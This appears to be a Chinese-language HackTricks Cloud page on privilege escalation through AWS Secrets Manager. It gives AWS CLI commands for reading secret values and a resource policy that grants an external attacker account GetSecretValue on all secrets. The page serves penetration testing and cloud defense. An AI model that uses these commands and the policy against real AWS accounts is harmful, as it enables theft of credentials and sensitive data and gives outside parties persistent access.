AWS - Secrets Manager Privesc

学习和实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习和实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 分享黑客技巧。

Secrets Manager

有关 Secrets Manager 的更多信息，请查看：

`secretsmanager:GetSecretValue`

拥有此权限的攻击者可以获取 AWS Secretsmanager 中 秘密内保存的值。

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

潜在影响： 访问 AWS Secrets Manager 服务中的高度敏感数据。

`secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)

通过之前的权限，可以授予其他主体/账户（甚至外部）访问秘密的权限。请注意，为了读取使用 KMS 密钥加密的秘密，用户还需要对KMS 密钥具有访问权限（更多信息请参见 KMS Enum page）。

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}

学习与实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

PreviousAWS - Sagemaker Privesc NextAWS - SSM Privesc

Last updated 1 month ago

Secrets Manager

secretsmanager:GetSecretValue

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

`secretsmanager:GetSecretValue`

`secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)